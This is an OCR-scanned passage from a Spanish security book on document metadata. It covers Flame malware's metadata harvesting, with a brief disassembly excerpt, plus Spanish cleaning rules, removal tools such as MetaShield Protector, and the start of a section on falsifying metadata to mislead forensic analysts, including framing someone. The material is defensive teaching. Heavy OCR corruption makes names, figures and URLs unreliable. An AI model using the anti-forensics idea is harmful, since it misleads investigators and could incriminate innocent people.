que,  probabl  entente,  los  antivirus  ni  siquiera  lo  analizaran  o  que,  por  muy  extrano  que  resultara  su 
comport  am  ien  to,  no  se  arriesgaran  a  clasificarlo  como  malware . 


sub_ 

lUOCblMitt 

proc 

near 

. text:10OC5DE8 

push 

offset  aGps_latitude  j  nG P S_LAT I TUDE " 

. text :100CSDED 

call 

de  crypt  __str  irvg 

. text : 100C5DF2 

pop 

ecx 

. text : 10GCSDF3 

push 

eax 

. text:10QC5DF4 

push 

offset  GPS_LAT ITU  DE 

. text : lOOcSDFd 

call 

|  copy_»tring 

, text : 100CSDFE 

push 

offset  sub_100F32F8 

. text:lG0C5EO3 

call 

_atexit 

-text ; 1O0C5EO8 

pop 

ecx 

-  text ; 100C5EO9 

retn 

. t«xt:100C5E09 

sub 

100C5DE8 

endp 

Tinageit  02,28:  C6digt>  de  The  Flame  destinadci  a  anali/ar  metadatos  GPS  de  fotografias. 


Flame  era  un  malware  tremendamente  modular  que  incorporaba  una  multitud  de  plugins,  con  unos 
20  MB  de  peso,  lo  que  le  permitia  llevar  a  cabo  una  gran  cant i dad  de  operaeiones.  Uno  de  los 
componentes  mas  llamativos,  sin  duda,  era  el  modulo  msght32.ocx,  que  se  dedicaba  a  la  recoteccion 
de  los  metadatos  de  los  documentos  de  la  maquina  in  fee  tad  a. 

Este  componente  trabajaba  de  forma  similar  a  A/etashield  Forensics,  herramienta  que  se  describe 
a  lo  largo  de  este  libro,  realizando  una  busqueda  por  todo  el  sistema  dc  ficheros  del  equipo  para 
focalizar  documentos  de  Microsoft  Office,  en  formato  PDF ,  Vls io,  AutoCAD ,  objetos  de  Microsoft 
Outlook  y  archivos  graficos.  De  todos  ellos  el  malware  se  dedicaba  a  ir  recolectando  los  metadatos 
asociados  a  ellos,  tales  como  fechas  de  creacion  y  modification,  auto  res  de  los  misos,  el  historial  del 
documento,  las  ubicaciones  GPS  siempre  que  fuera  posible,  etcetera. 


8  HTTP:  //uriaaldia  h  t  spascc,  com/20 1 2/05/thefl  am  e-refl  ex  ioneS’Sobre-otra  .HTML 
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De  los  archives  graftcos,  el  componente  recolectaba  informacion  EXIF relativa  a  coordenadas  GPS 
para  avers  guar  donde  se  habian  tornado  las  fotogralias  y,  con  cierta  probabilidad  estadlstica,  donde 
se  encontraba  (o  se  habia  encontrado)  el  si  sterna  atacado. 


Esquema  National  de  Seguridad 

Los  riesgos  de  seguridad  asociados  a  los  metadatas  son  tan  grandes  y  tan  evidentes  -  tanto  a  nivel 
personal,  como  empresas  privadas  o  administracion  publiea  -  que  dentro  de  la  normativa  de  obligado 
eumplimiento  por  Administracion  Publiea  y  empresas  publicas  y  privadas  que  Irabajan  con  el  la  que 
se  creo  en  Espana,  el  Esquema  Nacional  de  Seguridad* ,  se  ha  dedieado  un  apartado  especifico  a  la 
limpieza  de  documentos. 

Dicho  reglamaento  publicado  en  el  BOE  cuenta  con  el  siguiente  apartado  en  el  que  se  insta  a  tener 
una  pohtica  de  seguridad  asociada  a  los  metadatas  y  donde  se  explican  los  rlegos  asociados  a  el  los: 

Limpieza  de  documentos 

En  el  proceso  de  limpieza  de  documentos,  se  retirara  de  estos  toda  la  informacion  adicional  contenida 
en  campos  ocultos,  meta-datos,  comentarios  o  revisiones  anteriores,  salvo  cuando  dicha  informacion 
sea  pertinente  para  el  receptor  del  documento. 

Esta  medida  es  especialmente  relevante  cuando  el  documento  se  difunde  ampliamente,  como  ocurre 
cuando  se  ofrece  al  publico  en  un  servidor  web  u  otro  tipo  de  repositorio  de  informacion. 

Se  tendra  presente  que  el  incumplimiento  de  esta  medida  puede  perjudicar: 

-  A I  in  an  ten  i  m  i  ento  de  la  c  onfi  dene  i  a  l  i  dad  de  i  n  fo  rm  ac  i  6  n  q  ue  n  o  de  h  en  a  h  ab  ers  e  re  v  e  1  ado 
al  receptor  del  documento. 

-  Al  mantenimiento  de  la  conUdencialidad  de  las  fuentes  u  origenes  de  la  informacion,  que 
no  debe  eonocer  el  receptor  del  documento. 

A  la  buena  imagen  de  la  organization  que  difunde  cl  documento  por  cuanto  demuestra  un 
descuido  en  su  buen  hacer, 

^Cuantas  organizaciones  han  aplicado  esta  limpieza  de  metadatas ?  Pues  no  demasiadas,  En 
Septiembre  de  2013,  desde  Eleven  Paths ,  realizamos  un  sencillo  estudio  orientado  a  conocer  cuantas 
empresas  participantes  en  el  indice  IBEX  35  de  la  bolsa  de  Madrid  teinan  sus  sitios  weh  limpios  de 
fug  as  de  informacion  por  culpa  de  los  metadatas. 

El  IBEX  35  aglutina  a  las  35  empresas  mas  grandes  de  Espana  y  por  supuesto  todas  ellas  deben  tener 
relacion  -  en  mayor  o  rnenor  medida  -  con  la  administracion  publiea,  por  lo  que  era  de  suponer  que 
alguna  hubiera  tornado  alguna  medida  de  mitigacion.  Sin  embargo,  el  resultado  flic  que  ninguna 
weh  presentaba  los  documentos  limpios  de  metadatas  y  fue  posible  accede r  al  nombre  de  cast  3.000 
usuarios  solo  mi  ran  do  los  dominies  princi  pales  de  las  empresas  citadas. 


9  www.boe.es/boe/dias/20 1 0/0  i  /29/POFs/BOE-  A-20 1 0- 1 330,  PDF 
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4.  Eliminacion  de  metadatos 


Tras  lodo  lo  vista  hasta  et  momento,  la  gran  prcgunta  que  muchos  seguro  que  se  estan  haciendo 
es:  ^como  se  pueden  diminar  los  metadatas ?  En  esta  seed  on  se  van  a  exponeT  dife rentes  tecnieas, 
procedimientos  y  herramientas  que  pueden  utilizarse  para  que  los  documentos  publicados  en  sitios 
web  u  otros  tipos  de  repositorios  publicos  no  eontengan  informacion  que  piled  a  perjudiear  a  la 
entidad  productora  de  la  informacion, 

Para  poner  dc  manifesto  las  ventajas  e  inconvenientes  de  los  diferentes  metodos  disponibles,  se  ha 
establecido  una  division  entre  las  teenLcas  de  eliminacion  o  edition  de  metadatos  que  requieren  de 
acciones  por  parte  de  los  usuarios  y  que,  por  tan  to,  se  han  catalogado  como  tecnieas  manuales,  y 
aquellas  que,  de  forma  automatica,  realizan  los  pasos  necesarios  para  que  la  infonnacion  publicada 
no  eontenga  infonnacion  no  deseada. 


Eliminacion  de  metadatos  de  forma  manual 

Documentos  Microsoft  Office 

La  herramienta  definitiva  para  la  limpieza  de  documentos  Microsoft  Office  es  la  opcion  de 
Inspeccionar  un  document©  que  se  incorpora  en  las  versiones  de  Microsoft  Office  superiores  a  2007. 
Esta  herramienta  busca  tod  a  la  informacion  que  un  documento  tiene  tan  to  en  metadatos  introducidos 
por  el  usuario  como  infonnacion  del  documento,  metadatos  ocultos  introducidos  por  el  programa, 
infonnacion  de  las  impresoras  e  infonnacion  oculta. 

No  importa  la  version  del  formato  de  archivo  que  se  este  utilizando  ni  la  version  de  Office  utilizada 
para  su  creation,  ya  que  la  herramienta  permite  al  usuario  diminar  toda  la  informacion  que  no  se 
desee  incluir  al  distribuir  el  documento. 

Para  tener  estas  mismas  opciones  en  la  version  de  Microsoft  Office  2003  es  necesario  descargarse 
desde  la  web  dc  Microsoft.com  una  herramienta  a  parte  que  se  integrara  dentro  de  la  suite.  Esta 
utilidad  es  conoeida  como  RHD  (Remove  Hidden  Data)  y  se  encarga  de  realizar  absolutamente  las 
mismas  fimcionaltdades  que  las  que  vienen  de  serie  en  paquetes  ofimattcos  poster iores.  Hay  que 
decir  que  versidn  tras  version  Microsoft  mejora  las  opciones  de  las  herramientas,  y  que  las  primeras 
no  llcgan  al  nivel  de  detalle  de  las  ultimas. 

Para  acccdcr  a  esta  herramienta  de  limpieza  de  metadatos  en  Microsoft  Office  2007  se  debe 
seleccionar  la  opcion  Preparar  del  menu  de  Archivo  y  luego  la  opcion  de  Inspeccionar  documento. 
En  las  versiones  de  Microsoft  Office  2013  hay  que  ir  a  Infonnacion  y  alii  seleccionar  la  opcion  de 
“Com probar  si  hay  errores”,  donde  se  podra  ver  que  se  describe  la  opcion  como  “Inspeccionar 
Documento”. 

Al  final,  el  menu  la  que  se  accede  es  similar  a  I  que  puede  verse  en  la  Tmagen  02.28  que  sale  en  la 
pagina  siguiente,  con  opciones  y  resultados  similares. 
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Imagen  02,29:  Inspecdonar  documento  en  Microsoft  Office  2007. 


Microsoft  Office  para  Mac 

For  el  eontrario,  en  Microsoft  Office  2011  para  Mac  esc  menu  no  esta  disponible,  y  lo  unico  que 
existe  es  una  opcion  en  las  Preferences  /  Seguridad  de  eada  aplieacion  -  en  este  caso  Word  -  para 
que  se  eliminen  los  datos  personal  es  al  guardar  el  documento. 

Para  probar  el  funcionamiento  de  esta  opcion  en  Microsoft  Office  2011  para  Mac  utilizamos  el 
famoso  documento  de  Tony  Blair  que  tantos  quebraderos  de  cabeza  le  propino  por  culpa  de  los 
metadatas,  Se  hizo  una  copia  de  este  documento,  y  sc  guard 6  con  Microsoft  Office  para  Mac  2011 
seleccionando  la  opcion  de  eliminar  datos  personales  al  guardar. 

Al  pasarlo  por  FOCA  se  podia  observar  que  no  todos  los  metadatas  ban  sido  eliminados.  Entre  la 
Itsta  de  datos  aparecia  -  en  este  caso  -  la  plantilla  que  se  estaba  ulilizando,  la  version  de  software 
con  que  se  manipulo  el  documento,  y  la  fecha  de  im  pres  ion  original,  que  era  anterior  a  la  fecha  de 
creation  del  documento  dejando  una  muestra  clara  de  esta  manipulacion  realizada. 

En  el  caso  dc  Microsoft  Office  2011  para  Mac  no  parece  tener  mucho  sent] do  que  estando  esta 
opcion  dc  Tnspcccionar  documento  de  serie  desde  Microsoft  Office  2007  para  Windows,  no  la  hay  an 
incorporado  para  solucionar  el  problem  a  de  raiz  tambien  en  sus  version  es  para  Mac  OS  X. 
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Documentos  OpenOffice 

A  pesar  de  que  !a  suite  ofimatica  OpenOffice  ofrece  la  opcion  de  "Borrar  la  information  personal 
al  salir”,  esta  opcion  no  elimina  la  informacion  del  si  sterna  operativo,  las  impresoras,  la  version 
del  producto  o  la  rula  de  la  plantilla,  que  puede  mostrar  rutas  ocultas  o  direcciones  de  servidores 
internes,  ya  que  tan  solo  elimina  los  datos  introdueidos  por  el  usuario  a  la  bora  de  registrar  e! 
producto. 




T  LibreOffke 

Datos  derE  usuario- 
General 

Memoria 

Ver 

Irnprimir 

Rutas 

Colores 

Fuentes 

Aparlencla 

AcccsibiLidad 

Java 

►  Cargar/Guardar 

►  Configuration  de  idroms 

►  LibreOffice  Writer 

►  LibreOfficeWriber/Web 

►  LibreQff ice  Base 

►  GrAflcos 
*  internet 

Gpciones  de  seguridad  y  alertas - - - - — -  1 

Aiuchar  Lit  nnrvinat  ■, i 

Optionee  de  seguridsd  y  alertas 

Adverttr  si  el  documento  contrene  cambist  grab  ados,  versions,  inf  orma  cion  ocutta  o 
notas: 

O  Al  guardar  □  enviar  &  Al  f)r ma  r 

1  Al  j tnprimir  C  Al  c  rear  a  rehivos  pD  F 

Opci  ones  de  seguridad - — — - 

V laminar  la  inFormatiAn  personal  al  quardarj 

"!  Becomiendar  protection  con  contra sena  al  guar dar 

Sf  Requerir  Ctrl-dk  para  visits  r  hipervinculos 

CanceUr  |j  Ayyda 

Aceptar  .  ;  .  ,  ,  Cancelar 

;;’.j  Ayude  ,  j-g  Regressr 

Imagen  02,30:  Rorrar  informacion  personal  al  gu^ 

irdar 

Para  solucionar  esle  problems  de  la  herramienta  de  limpieza  de  metadatas  de  OpenOffice,  desde 
Informdtica64  se  desarrollo  una  aplicacion,  llamada  OpenOffice  MetaExtractor1 que  permite 
limpiar  de  forma  sencilla  y  eficaz  los  metadatas  almacenados  en  cualquier  fiehero  OpenOffice  La 
herramienta  soporta  los  ficheros  de  las  versiones  OpenOffice  2.x,  3.x  (*.odt  *.ods  *.odg  *.odp)  y 
OpenOffice  Lx  (*.£ov),  y  esta  pensada  para  extraer  o  sustituir  la  siguiente  informacion: 

Aplicacion  generadora  del  documento  y  Si  sterna  operativo 
Usuarios  (Creador  del  documento,  modification  impreso  por) 

Fechas  de  ereaeion,  modificacion,  impresion  RHD 

-  Thu  Jo,  asunto,  descripcidn,  palabras  clave,  estadisticas. 

-  Numero  de  ediciones,  tiempo  de  edieion 
Informa ci on  deb n i da  por  el  us uari o 

-  Rutas  de  pi  anti  I  las,  Impresoras,  bases  de  datos 

-  Emails,  enlaces 

-  VeTsiones  guardadas 


1 0  HTTP :  H  GO  Meta  Extractor .  c  ode  plex  .eo  ml 
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£5  OOMeta  Extractor 
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Archive  Pestanas  Metadatos  Opdones  Sobre,,, 


gu. 


deJoZ  |  Modelosoiiotudbe  IK  sm  odt  M.  sdidtud%20conve  .10[  k[  1  -  * 


Generado  con.  GpenOffice  Qfg/2.0  Version:  QpenOFfice  org pfoject/S3QTilSBLiifd-89'5[) 

S  stem  a  Operate:  Win32 

Inidaimente  creado  por:  LSK 

fecha  de  creacton:  20034)1-2 2  14:32:00 

Fecha  de  modificadon;  20064)7-27  09  20  39 

Fecha  de  impresion:  20053 14)8  12:57  00 

Lenguaje:  es-ES 

Tituta:  Are  You  supnsed  ? 

Asunto:  Birthday 

De&cripdon  Shankars  Birthday  faBs  on  25th  July.  Donl  Forget  to  wish  him 

Palabras  clave:  Birthday 

Veces  editado  52 

Tiempo  de  edition :  6  H  4 1 M295 

Estadisticas 

Tablas  3 
Imagenes :  2 
Qbjetos:  0 
Paginas;  1 
Paitafos  31 
Palabras :  170 
Caracteres:  1427 

tnpresora  Epson  Stylus  COLOR  850  ESC/P  2 
Emails: 

sofdte@unac.es 


I  mage  n  0231:  Metadatas  extraidos  con  OOMetaExtracto  r . 


Ademas,  OO Met aExtr actor  permite  utilizar  una  plantilla  corporativa  para  la  gestion  de  I  os 
metadatas ,  de  tonna  que  se  sustituyen  los  va  lores  para  determ  inados  metadatas  por  unos  previamente 
establecidos  por  el  administrador.  A  si,  por  ejemplo,  podria  establecerse  de  antemano  que  todos  los 
documentos  contuvieran  en  el  jwetadato  Autor  el  norobre  de  la  empresa  u  organization. 


r 


&  Optionee  para  el  borrado  de  metadatas 


OpenOffice 


Selections  los  mdadatos  que  desea  borrar  o  edftar 


Tipo 


Borrar  /  Nuevo  valor 


m 


Description 

Enlaces 


Asunto 

Bases  de  datos 


M\  Documento  Publico 

m 

5":  Documento  de  Empresa 

m 


imagen  0232:  Valores  a  sustituir  cn  todos  los  documentos. 
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Eliminacioii  de  met  ad  at  os  en  imagenes 

La  mayor  (a  de  I  os  editores  de  imagenes  incorporan  op  clones  de  elimmacidn  de  l  os  metadatas  que 
las  imagenes  almacenan.  En  el  caso  del  editor  de  imagenes  Gimp,  por  plantear  un  ejemplo.  basta 
con  mostrar  las  opciones  avanzadas  c  nan  do  se  guard  a  un  archive,  y  desmarcar  la  opcion  Guardar 
los  datos  EXIF. 

Por  otra  parte,  tambien  existen  herramientas  que  permiten  eliminar  metadatas  de  v  arias  imageries 
al  mismo  tiempo,  como  es  el  caso  de  la  aplicacion  MetaStripper u,  con  la  que  basta  con  seleccionar 
un  di  recto  rio  para  eliminar  to  da  la  meta-information  de  todas  las  imagenes  alii  almacenadas.  Si  !o 
que  se  desea  es  modificar  el  contenido  de  determinados  campos  de  los  metadatas  de  una  imagen,  es 
posible  utilizar  aplicaciones  como  PhotoME12,  con  las  que  el  usuario  puede  elegir  el  valor  a  asignar  a 
los  campos  que  quiera  modificar,  como  el  autor,  por  ejemplo,  estahledendo  los  valores  corporativos. 


Image  ei  0233:  Snaps  Cleaner,  una  herramienta  para  Mac  OS  X. 

Ademas,  ex  is  ten  algunas  aplicaciones  que  se  ejecutan  desde  la  linea  de  com  and  os  y  que,  por  tanto, 
podrian  usarse  para  automatizar  basta  cierto  punto  las  tareas  de  limpieza  y  edicion  de  metadatas 
de  las  imigenes,  al  poder  incluirse  en  scripts  de  administracidn,  como  EXIFtooV*  o  exiv2l49  que, 
ademas,  son  herramientas  multiplataforma. 

1 1  //TTTV/www.  photothumb,  com/  MetaStripper! 

12  HTTP:  //www.  photonie.de 

1 3  HTTP :  // WWW.  sn  o .  phy.  q  ueen  su.ca  -  ph  i  I IEXIFXq ol/ 

[  4  // TTP  Ji ww w.  ex  tv  2 .  org/Dtf wntoad.HTML 
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Elimination  de  metadatas  de  forma  automation 

Aunque  todas  las  apltcaciones  perm  i  tie  ran  iimpiar  los  documentos  de  metadatas  e  informacion 
oculta  y  lo  hicieran  de  forma  precisa,  depender  de  los  usuarios  para  que  iimpien  cada  fichero  antes 
de  subirio  a  un  servidor  publico,  enviarlo  por  correo  electron ico  o  distribuirlo  de  cualquier  otro 
modo,  es  un  plan  poco  cfieiente  y  con  pocas  posibilidades  de  dxito. 

La  responsabilidad  de  la  limpieza  de  los  documentos  no  debe  recacr  en  los  usuarios,  que 
probablemente  no  esten  los  suficientemente  concienciados,  motivados,  fonnados  o  concentrados 
para  no  cometer  errores  ni  descuidos. 


Es  necesario  que  las  organ  izaci  ones  establezcan  mecanismos  de  proteccion  que  Iimpien 
automaticamente  los  documentos  antes  de  ser  distributes  a  sus  clientes,  de  manera  que  el 
admin istrador  de  un  sitio  web  pueda  estar  seguro  de  que  los  documentos  publicados  no  contienen 
dates  no  deseados. 


MetaShield  Protector 

MetaShield  Protector**  es  una  familia  de  herramientas  comerciales  de  Eleven  Paths  enfocadas  en 
evitar  la  fuga  de  informacion  en  documentos  ofimaticos  a  traves  de  su  pubticacion  en  sitios  web.  Para 
cllo,  el  documento  ofimatieo  antes  de  ser  entregado  sera  limpiado  en  memoria  por  el  componente, 
llegando  al  clientc  una  copia  total mente  limpia  de  metadatas  e  informacion  oculta, 

Actuaknente  la  familia  esta  compuesta  por  las  siguientes  soluciones: 

■  MetaShield  Protector  for  IIS:  Evita  las  fugas  dc  informacion  por  medio  de  metadatas  en 
documentos  ofimaticos  publicados  en  servidores  web  de  Microsoft  IIS. 

-  MetaShield  Protector  for  SharePoint:  Solucion  para  Iimpiar  los  metadatas  de  los 
documentos  publicados  en  repositories  documentales  de  Microsoft  SharePoint  Servers  -  en 
tod  as  s  us  versiones  y  familias 

-  MetaShield  Protector  for  File  Server  /Non  MS  Web  Servers:  Fun  cion  a  como  un  servicio 
del  si  sterna  operativo  que  monitoriza  la  c  read  on  y  modificacion  de  cualquier  fichero  en 
una  determ  inada  ubicacidn  de  almacenamiento.  En  el  case  de  servidores  no  Microsoft,  se 
comp ar ten  las  carpetas  por  red  median tc  SMB  y  la  herramienta  protege  desde  otro  servidor 
cualquier  fuga  dc  informacion  por  metadatas . 

“  MetaShield  for  Client:  Es  la  solucion  para  usuarios  dc  escritorio.  Con  una  opcion  de 
botdn  derecha  se  limpian  los  metadatas  dc  cualquier  documento  del  sistema  operativo.  Se 
explicara  en  el  Anexo  4. 

-  MetaShield  Forensics'.  Tnicialmente  se  conoeia  como  Forensics  FOCA ,  pero  ha  sufrido 
un  cambio  de  nombre.  Es  una  solucion  para  anahstas  forenses  que  extrae  metadatas  de  todos 
los  documentos  de  un  equipo  y  genera  un  time-line  con  las  fechas  obtenidas  de  el  los. 


1 5  HTTPJiwww,  m  e-tosh  ield  protcctor.com/ 
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MetaShield  Protector  for  IIS  y  MetaShield  Protector  for  SbarePoint 

La  solution  funciona  como  un  modulo  de  Intenet  Information  Services  para  Windows  Server  2008 
/  2008  R2  /  2012  y  esta  totalmente  integrado  con  la  arquitectura  del  servidor  web.  Asi,  euando  el 
servidor  web  recibe  la  peticion  de  un  fichero  ofimatico,  este  sera  entregado  a  MetaShield  Protector 
para  que  lo  limpie  en  mernoria. 

Una  vez  que  se  han  eliminado  todos  los  metadatas  del  fichero  o  se  han  establecido  unos  valores 
previamente  establecidos  por  el  administrador,  el  documento  se  entregara  al  cliente<  Por  tanto, 
el  fichero  original  mantiene  todos  sus  metadatas ,  que  pueden  resultar  may  utiles  para  el  gestor 
documental  intemo  de  la  compama,  y  tan  solo  se  lirnpia  o  modifica  la  inform ac ion  de  la  copia  que 
se  entrega  al  chenle. 

MetaShield  Protector  for  7/5  ha  sido  probado  lan to  en  sitios  Web  donde  la  descarga  de  ficheros 
se  realiza  mediante  un  enlace  direeto  al  documento  como  en  sitios  donde  se  encuentra  instalado 
Windows  Share  Point  Set-vices  3,0  o  Microsoft  Office  Share  Point  Server  2007 ,  2010  o  2013 ,  donde 
Ids  documentos  se  alojan  en  base  de  datos* 


MetaShield  Protector  for  IIS  y  MetaShield  Protector  for  Share  Point  se  instalan  a  nivel  de  servidor 
weh  Internet  Information  Services  y  se  activan  o  desactivan  a  nivel  de  cada  sitio  web  alojado  dentro 
del  serv  idor.  Asi,  su  ap  Head  on  a  un  detenu  inado  sitio  web  es  tan  facil  como  aclivar  la  option  en 
el  menu  contextual  que  aparece  tras  hacer  die  con  el  boton  derecho  sobre  cada  sitio,  tal  y  como  se 
puede  apreciar  en  la  figura  02.35.  La  desmstalacion  de  un  sitio  es  exactamente  el  mismo  proceso: 
boton  derecho  sobre  el  sito,  desinslalar  MetaShield  Protector. 
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Imagen  02.35:  Instalacion/Desinstalacion  de  MetaShield  Protector  en  un  silio  web, 

Una  vez  configurada  la  proteccion  para  evitar  la  fuga  de  informacion  por  medio  de  los  metadatas  en 
doc u menlos  ofimaticos  de  un  sitio,  se  pueden  configurar  las  opciones  personal izadas  de  cada  uno  de 
el  los,  En  el  panel  de  configuracion  del  modulo  se  debe  configurar^  en  primer  lugar,  un  repositorio 
de  estadisticas.  Este  almacen  tiene  que  ir  sobre  un  motor  de  base  de  datos  Microsoft  SQL  Server  o 
Microsoft  SQL  Server  Express,  Durante  el  proceso  de  instalacion  del  producto  se  piiede  elegir  entre 
utilizar  un  servidor  existente  en  la  empresa  o  un  motor  en  version  Express  nuevo  que  se  instalara 
con  el  producto, 

Para  cada  uno  de  los  sitios  se  podra  personal izar  cuales  son  los  formatos  de  documentos  que  han  de 
ser  limp  i ados  de  metadatas  para  ese  sitio*  El  producto  permite  activar  la  limpieza  para  documentos 
Microsoft  Office  en  binario  -  es  decir,  versiones  desde  Microsoft  Office  97  a  2003 ,  de  ficheros  .doc, 
■xlsf  -pps  o  .ppt  -  ficheros  de  versiones  OOXML  para  Microsoft  Office  2007 ; 2010  y  201  i,  en  formato 
doex,  xlsx,  ppsx  o  pptx,  ficheros  en  formato  PDF  y  ficheros  de  OpenOffice  de  tipo  sxw,  ods,  odp ; 
odl  y  odg. 
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Imaggn  02,36:  Coniiguracion  de  MetaShield Protector. 


Estas  opciones  de  configuration  por  sitio  permiten  al  administrador  de  un  detenu  inado  sito  web 
realizar  una  administracion  mucho  mas  granular  y  optimizar  los  tiempos  de  respuesta  de  todos  y 
cada  Lino  de  los  sili  os  alojados  en  el  mismo  send  dor. 

La  limpieza  de  los  documentos  en  memoria  implica,  como  es  de  esperar,  un  pequeno  retardo  en 
tiernpo,  Este  retardo  sera  mayor  o  menor  en  funcion  del  tamano  del  doeumento  y  el  formato. 

Para  que  el  administrador  pueda  conocer  cual  es  el  uso  quc  esta  realizando  el  componente  en  cada 
sitio  web,  se  puede  acceder  a  las  estadisticas  y  ver  cuantos  documentos  han  sido  limpiados,  es 
decir,  cuantos  documentos  son  aquellos  en  los  que  se  ha  eneontrado  algiin  mc/^dato  o  information 
confidential,  el  numero  de  documentos  quc  se  han  descargado  por  tipo  de  fichero  y  el  tiempo  que  ha 
llevado  de  media  el  limpiar  cada  tipo  de  fichero.  Con  esta  informacion  se  podra  decidir  la  aplicacion 
de  mcdidas  especial  es,  como  la  limpieza  del  archivo  original  para  erradicar  los  metadatas  para 
siempre,  o  la  desactivacion  de  la  limpieza  sobre  determ inados  documentos  en  detemiinados  sitios 
de  los  que  se  tiene  !a  certeza  de  que  estan  limpios. 


94 


Pentesting  con  FOCA 


En  la  figura  0236  se  puede  apreciar  que  en  el  panel  de  configuracion  de  MetaShield  Protector  hay 
ima  lista  de  los  documentos  descargados  eada  dia.  En  ella  se  almacena  el  detalle  de  los  tiempos  que 
ban  si  do  necesarios  para  limpiar  eada  uno  de  los  archives. 

Observando  la  Figura  02.37  con  detalle  es  posible  comprobar  el  tiempo  que  ha  lardado  MetaShield 
Protector  en  limpiar  el  doc  u  men  to  Biair.doc,  objeto  de  la  polemica  en  el  gobiemo  britanico  con  el 
que  se  abria  el  primer  caprtulo  del  libro:  47  inilisegundos,  es  decir,  aproximadamente  la  veinteava 
parte  de  un  segundo. 

Accediendo  a  las  cstadisticas  de  eada  sitio  web  se  puede  conocer  el  numero  total  de  ficheros 
descargados,  el  numero  total  de  el  los  que  ban  side  I  im  pi  ados  y  la  c  anti  dad  de  archivos  de  los  que  no 
se  han  podido  eliminar  los  metadatas  ni  la  informacion  oculta.  Esto  puede  ocurrir  porque  el  fichero 
esta  corrupto  o  porque  el  archive  esta  firmado  digitalmente.  La  limpieza  de  los  metadatas  romperia 
la  firnia  digital  y,  por  tanto,  la  herramienta  no  los  modifica. 

En  la  imagen  0238  puede  comprobarsc  cual  ha  sido  el  tiempo  medio  de  limpieza  de  los  documentos: 
1 97  milisegundos.  Ese  es  el  impacto  medio  que  se  produce  sobre  el  tiempo  de  respuesta  del  servidor 
al  evitar  tener  una  i'uga  de  informacion. 
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En  la  figura  02,39  se  muestra  el  tiempo  medio  de  limpieza  por  tipo  de  documento.  En  este  ejemplo 
se  puede  ver  que  el  formato  doex  toma  mas  tiempo  que  los  formatos  doc  y,  aunque  no  sirva  como 
benchmark  o  indicador,  si  que  es  cierto  que  los  formates  ODFy  OOXML,  debido  a  que  son  formatos 
comprimidos  que  deben  ser  descomprimidos  para  que  puedan  ser  limpiados,  son  los  que  mas  tiempo 
p ue den  requerir. 
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Imagen  02.38:  Tiempo  medio  de  limpieza  portipo  de  fichero. 


MetaShield  Protector  permite,  ademas,  crear  una  politica  de  imagen  corporativa  asociada  a  los 
ficheros  publicados.  De  esta  forma,  en  lugar  de  eliminar  los  metadatas  y  la  information  oculta,  es 
posible  crear  una  politica  en  la  que  el  admin  is  trador  puede  elegir  el  valor  a  incluir  en  determ  inados 
metadatas,  escoger  otros  metadatas  que  sen  an  eiiminados  y  seleccionar  otros  campos  eri  los  que  se 
mantuviera  el  valor  original. 

A  si,  la  politica  establecida  por  el  admin istrador  mostrada  en  la  imagen  02.34,  incluira  el  valor 
Jnformdtica64  en  el  metadata  Company ^  eliminara  cualquier  dato  que  vaya  en  el  metadata  Author , 
pero  mantendra  el  nombre  del  titulo  del  doeumento,  es  decir,  que  el  valor  del  metadata  Title  no  se 
modifieara,  en  todos  los  documentos  Microsoft  Office ,  OpenOffiee  y  PDF  que  sirva  el  servidor  web . 


Imagen  02.39:  Plantilla de  acciones. 
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MetaShiekl  Protector  for  Client 

MetaShield  Protector  For  client  es  una  herramienta  que  elimina  los  metadatas  de  forma  rapida 
y  efectiva.  Crea  una  copia  del  doe  u  men  to  limpia  de  metadatos  permitiendo  mantener  intacto  el 
documento  original.  Eleven  Paths  ha  desarrollado  esta  herramienta  para  enter  nos  Windows,  y  es 
capaz  de  eliminar  metadatas  de  documentos  Office ,  Open  Office,  StarOfhce,  PDF,  Jpg  e  tncluso 
de  documentos  i  Works  de  Apple.  Solo  es  necesario  loealizar  uno  o  varios  documento  en  la  maquina 
(o  dentro  de  algun  directorio  compartido  de  la  red)  para  realizar  con  un  die  de  raton  la  operacion. 

Esta  herramienta  ademas  permite  poder  seleccionar  que  tipo  de  limpieza  se  quiere  realizar: 

-  Clean  keep  original ft l es :  G enerand o  u n a  cop i a  exac ta  del  documento  limpia  de  metada tos 
manteniendo  el  original  intacto. 

-  Clean  Metadata :  L  i  m  p  i  an  do  d  i  rectarn  e  nte  1  o  s  metadatas  del  doc  um  en  to  origi  n  a  I . 


Imagen  02.40:  MetaShield  Protector  for  client. 

La  ve  loci  dad  del  proceso  depend  era  de  la  cant  id  ad  de  arch  iv  os  s  elec  cion  ad  os  y  su  tamano.  Los 
ejemplos  vistos  en  este  capitulo,  recuerdan  que  son  muchos  los  que  desconocen  que  existe  metadatos 
en  los  documentos  digitales  y  que  son  accesibles  a  cualquiera  en  la  red.  For  otro  lado,  un  documento 
libre  de  metadatos  indica  seriedad,  responsahilidad  y  dedication  por  parte  de  su  propietario,  al  no 
di vulgar  ningtin  tipo  de  informacidn  sensible  fuera  de  lo  estrictamente  necesario. 
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Manipulando  metadatos  para  enganar  a  la  FOCA 

Los  metadatos  de  un  documento  se  pueden  modificar,  al  igual  que  el  banner  de  un  servidor  web  o  la 
version  de  un  servidor DNS{covcto  hacen  los  chicos  de  RedHat).  De  hecho,  para  ocultar  la  informacion 
a  las  teenicas  fingerprinting  basicas,  esos  datos  se  modificaii  para  intentar  enganar  a  tos  usuarios 
nxenos  expen mentados.  Sin  embargo,  cuando  se  hace  un  pentesting,  los  datos  i  mportantes  se  revisan 
y  confirm  an  manualmente  para  detectar  las  teenicas  de  deception  y  sacar  la  informacion  corrects. 

AsL  cuando  se  lee  el  banner  de  un  serv  idor  web,  si  algo  suena  raro  con  el,  se  le  pasa  una  herramienta  de 
fingerprinting  al  serv  idor  que  evalue  el  tipo  de  respuesta,  el  orden  de  la  misma,  y  el  comportarn  lento 
ante  determinadas  situaciones  para  podcr  garantizar  la  version  del  servidor  web. 

Con  los  metadatos  la  man!  pu  lac  ion  es  igualmente  posible.  Cuando  en  el  ano  2008  pen  samos  en  para 
que  podria  ser  util  modifkar  los  metadatas  se  nos  ocurrieron  varios  escenarios  posibles: 

Anti  forensics:  Alguien  que  q  nisi  era  ineriminar  a  otra  persona  haciendo  creer  que  el 
documento  lo  habia  escrito  otro  para  enganar  a  un  analista  forense  en  una  investigacion, 
Esto  sera  especialmente  importante  a  tener  en  cuenta  en  el  analisis  forense  judicial,  del  que 
hablaremos  en  el  anexo  dedicado  a  MetaShield  Forensics. 

-  Metadata  Honey  Pot:  Alguien  que  quisiera  detectar  si  se  estaban  utilizando  los  metadatas 
